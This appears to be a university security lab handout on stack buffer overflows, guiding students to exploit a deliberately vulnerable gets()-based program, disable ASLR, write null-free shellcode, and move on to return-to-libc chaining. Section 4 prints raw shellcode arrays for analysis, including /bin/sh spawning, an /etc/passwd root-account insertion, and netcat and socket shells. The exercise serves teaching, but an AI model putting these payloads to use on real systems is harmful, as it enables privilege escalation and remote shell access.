# TD 5: shell code, on-stack buffer overflow

Get the TD tarball from https://dept-info.labri.fr/~thibault/SecuLog/td5.tgz unpack it, run make

Note : it's really important to use make : the makefile passes the <code>-zexecstack</code> option to the linker so that our shellcode can get executed on the stack.

## 1 The magic example

The goal in this section is to get used to the tools to observe a program behavior.

Run ./magic, notice that it hangs. Check the source code, remember what we said about it.

Run it in gdb, put a breakpoint on main and step through the program with ni. Notice when the loop goes back to its beginning. Print the address of i and of t [11], explain why the behavior.

Run the program from its beginning again, this time use pframe to print the stack. Notice how it does indeed contain garbage at the beginning, and gets zeroed by the loop, until i gets hit.

## 2 The shellcode example

#### 2.1 Achieving the exploit

Notice that when anodin is build where are warnings : libc still provides the function, but does not provide a prototype any more in stdio.h! It also warns that the function is *dangerous*!

Run

./exploit | ./anodin

It prints an address (we here assume that somehow we manage to extort it from anodin). Copy/paste it, so as to give it as input to exploit, type enter.

A /tmp/ahah file got created, anodin got pwnd!

If anodin had the setuid bit for instance, or if it was a webserver, it would be a huge security breach!

### 2.2 Shell code and feeding it

Read exploit.c, this is the same shellcode as seen in the course. We have added the nops and return addresses to trick anodin.

### 2.3 Disabling ASLR

Run anodin alone several times with and without randomization : ./anodin setarch -R ./anodin Notice how the buf address is random or not. With ASLR disabled, we can create a constant input for anodin :

```
./exploit > hack
0x7ffffffe070
```

And now we can feed the constant input to anodin :

```
setarch -R ./anodin < hack</pre>
```

Ok, it is still getting pwnd, in a simpler way, this will allow us to easily observe what is happening, in gdb.

#### 2.4 Running in gdb

Let's try to run it in gdb :

setarch -R gdb ./anodin
[...]
(gdb) r

Oops, a different address is getting printed... Use exploit again to create a hack-gdb file with that address. Let's now run with the hack-gdb input :

```
setarch -R gdb ./anodin
[...]
(gdb) r < hack-gdb</pre>
```

Ok it still gets pwnd!

Quit gdb, run it again (otherwise it is a bit lost due to the execve("/bin/sh")). Set a breakpoint on litentier, run it again with the hack-gdb input. Call pframe to check what the stack looks like. Co-py/paste the output somewhere, to save a copy of what it looks like now. Print the address of buf, check where that is.

Type n until gets gets executed. Call pframe again, see that buf indeed got filled with the shellcode (you can recognize the hex printout, notably starting with the nops 0x90). See how buf actually got overflowed, and the return address got completely mangled. See where it points at.

Type n until gdb gets to the return instruction. Now switch to assembly output by typing Control-X 2 twice. Now use si to proceed with the programe assembly instruction by assembly instruction. Call pframe at each instruction to make sure what is happening with bp/sp. Notice where ret jumps to. Yes, bp is also pointing to buf, that's because we really went up the stairs with overflowing the stack with its address :) After ret is executed, you will see ip (instruction pointer) showing up in pframe, the processor is now executing our shellcode!

Proceed carefully through the shell code, checking what is happening in registers and on the stack. Notice how the call and pop do properly get the address of "/bin/sh". At the syscall instruction, check the content of the registers containing the parameters of the system call.

Try to give an address which is a bit higher than what anodin printed. It should be still working, it will just execute a bit less nops.

# 3 Building a shellcode

Read shellcode. S, it simply creates a file and exits.

Run strace ./shellcode to check that it indeed works properly.

Run objdump -d shellcode to get the machine language result in hexadecimal. Notice that the address of filename is recorded as absolute address. Use call and pop to fix this like the shell of the previous section. Now we have a relocatable shellcode.

Check that your code takes at most 64 bytes, since that's the size of the targetted buffer.

You can try to run it by embedding it in a C program like this :

Take care that objdump sometimes abbreviates zeros with "...", look at the addresses to make sure that you have all the bytes, and introduce zeroes as needed.

Note that you have to compile the C program with -zexecstack so that the stack, and thus the shellcode array, is executable. The Makefile already does that for you.

If the program crashes, you can check the disassembled version inside gdb by hand :

Once the shellcode works, you can try to inject this shellcode into the execution of anodin : make a new copy of exploit.c, and replace, in that new copy, the shellcode of section 2 with your own shellcode. You may have to get rid of some of the nops (x90), they take room and you do not have much room (64 bytes!). Since we know exactly the address of buf, you may even drop ptr += 8 and completely get rid of the nops.

If that does not work, use the method mentioned above to run anodin in gdb, by preparing a hack-gdb file.

Note that your shellcode has \0 characters, fix this using the tricks mentioned in the course. Note that you can use gdb to perform computations and conversions :

```
(gdb) p/x 0666
$1 = 0x1b6
(gdb) p/x -0666
$2 = 0xffffe4a
(gdb) p/x ~0666
$3 = 0xffffe49
```

## 4 Looking at shellcode

Here is a list of shellcodes. You can stuff them in a global char array (not on the stack!) of a trivial C program, compile it with -m32 or -m64 depending whether it is a 32bit or a 64bit shellcode, and use objdump -D to read the assembly (beware of the line . . . which means "some zeroes, I was lazy to show them"), or use disas on the address of the arrays in gdb.

Find out what they are doing and how. Explain the tricks they use.

1. 32bit:

```
unsigned char shellcode[] =
    "\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80"
    "\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
```

2. 64bit:

```
unsigned char shellcode[] =
    "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54"
    "\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
```

3. 32bit:

```
unsigned char shellcode[] =
    "\x5e\x29\xc0\x88\x46\x0b\x89\xf3\x66\xb9\x01\x04\x66\xba\xb6\x01\xb0"
    "\x05\xcd\x80\x93\x29\xc0\x29\xd2\xb0\x04\x89\xf1\x80\xc1\x0c\xb2\x0a"
    "\xcd\x80\x29\xc0\x40\xcd\x80\xe8\xd2\xff\xff" "/etc/passwd" "\xff"
    "z::0:0:::\n";
```

4. 64bit:

```
"\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x48\xc1\xef\x08"
"\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xe9"
"\x08\x51\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1"
"\xeb\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\xff\x31\x33\x33\x37\x49"
"\xc1\xea\x20\x41\x52\x49\x89\xe2\xeb\x11\x41\x59\x52\x51\x53\x41\x52"
"\x41\x51\x57\x48\x89\xe6\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\xff\xff\x31\x32"
"\x37\x2e\x30\x2e\x30\x2e\x31";
```

5. 32bit:

```
unsigned char shellcode[] =
```

```
"\xd9\xee\x9b\xd9\x74\x24\xf4\x5d\x8d\x6d\x59\x31\xdb\xf7\xeb\xfe\xc3"
"\x51\x6a\x06\x6a\x01\x6a\x02\xff\xd5\x89\xc6\xfe\xc3\x52\x66\x68\x7a"
"\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\xff\xd5\xb3\x04\x6a\x01\x56\xff"
"\xd5\xb3\x05\x52\x52\x56\xff\xd5\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0"
"\x3f\xcd\x80\x75\xf8\x31\xdb\xf7\xe3\x51\xeb\x13\x5e\x87\xe6\x87\xdc"
"\xb0\x0b\xcd\x80\x5f\x6a\x66\x58\x89\xe1\xcd\x80\x57\xc3\xe8\xff"
```

# 5 To go further : NX? Still pwnd!

We'll try to drop the -zexecstack build option, i.e. make the stack non-executable, and still be able to exploit the anodin program.

In all the following, disable ASLR, and compile in 32bit mode by adding –m32 in the CFLAGS.

- First, since we know the exact address of the buffer, we can drop the duplicate return-address overwrites, to keep only the one that actually overwrites the return address. Do that, check that the exploit still works, and the stack is modified exactly as needed, no more, no less.
- Then make anodin just return to the exit function. For simplicity, modify anodin to print the address of the exit function along the address of the buffer. We'll see in the next TD how to obtain such kind of address.
- Drop the -zexecstack option from the Makefile, see that the exploit still works.
- See that you can set the parameters of exit as you wish.
- Replace exit with execve, and set the parameters properly.
- Read http://phrack.org/issues/58/4.html#article and https://web.archive.org/ web/20210508015825/https://www.ret2rop.com/2018/08/return-to-libc.html to get more details on Return-Oriented-Programming, using libc, notably the sp lifting method.
- Use the sp lifting method in order to manage to make another function call before calling execve.